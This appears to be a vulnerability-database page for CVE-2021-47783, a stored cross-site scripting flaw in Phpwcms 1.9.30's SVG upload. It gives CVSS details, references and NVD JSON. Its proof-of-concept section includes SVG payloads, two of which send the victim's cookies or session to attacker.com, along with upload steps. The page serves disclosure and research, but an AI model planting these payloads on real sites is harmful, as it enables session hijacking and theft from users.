CVE-2021-47783

Description

Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpwcms:phpwcms:1.9.30:*:*:*:*:*:*:* - VULNERABLE

Phpwcms 1.9.30

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Malicious SVG file for CVE-2021-47783 -->
<!-- This PoC demonstrates the XSS vulnerability in Phpwcms file upload -->

<!-- Basic XSS PoC -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <rect width="100" height="100" fill="red"/>
</svg>

<!-- Cookie Stealing PoC -->
<!-- <svg xmlns="http://www.w3.org/2000/svg">
  <script>
    <![CDATA[
      fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
    ]]>
  </script>
</svg> -->

<!-- Session Hijacking PoC -->
<!-- <svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <script>
        document.location='https://attacker.com/hijack?session='+document.cookie;
      </script>
    </div>
  </foreignObject>
</svg> -->

<!-- Upload Instructions:
1. Login to Phpwcms with valid credentials
2. Navigate to file upload functionality (multiple file upload feature)
3. Upload this SVG file
4. When victim views the uploaded SVG, XSS payload executes
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47783
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47783
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47783/
[4] VulDB https://vuldb.com/cve/CVE-2021-47783
[5] http://www.phpwcms.org/
[6] https://www.exploit-db.com/exploits/50363
[7] https://www.vulncheck.com/advisories/phpwcms-arbitrary-file-upload
[8] https://www.exploit-db.com/exploits/50363

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47783", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:21.503", "lastModified": "2026-02-09T14:52:36.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpwcms 1.9.30 contains a file upload vulnerability that allows authenticated attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG payloads through the multiple file upload feature to potentially execute cross-site scripting attacks on the platform."}, {"lang": "es", "value": "Phpwcms 1.9.30 contiene una vulnerabilidad de carga de archivos que permite a atacantes autenticados cargar archivos SVG maliciosos con JavaScript incrustado. Los atacantes pueden cargar cargas útiles SVG manipuladas a través de la función de carga de múltiples archivos para ejecutar potencialmente ataques de cross-site scripting en la plataforma."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpwcms:phpwcms:1.9.30:*:*:*:*:*:*:*", "matchCriteriaId": "4FC001B8-FE0C-47C7-BA0E-36A0FFE00285"}]}]}], "references": [{"url": "http://www.phpwcms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50363", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/phpwcms-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50363", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "VDB Entry"]}]}}